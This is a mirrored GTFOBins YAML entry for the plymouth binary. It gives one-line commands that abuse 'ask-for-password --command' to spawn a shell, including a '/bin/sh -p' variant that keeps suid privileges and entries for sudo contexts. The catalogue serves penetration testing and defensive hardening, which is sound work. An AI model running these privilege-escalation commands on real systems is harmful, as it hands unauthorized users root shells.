mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-08-07 19:54:12 +02:00
14 lines
268 B
Plaintext
14 lines
268 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
plymouth ask-for-password --prompt=x --command=/bin/sh
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
code: |-
|
|
plymouth ask-for-password --prompt=x --command='/bin/sh -p'
|
|
shell: false
|
|
unprivileged:
|
|
...
|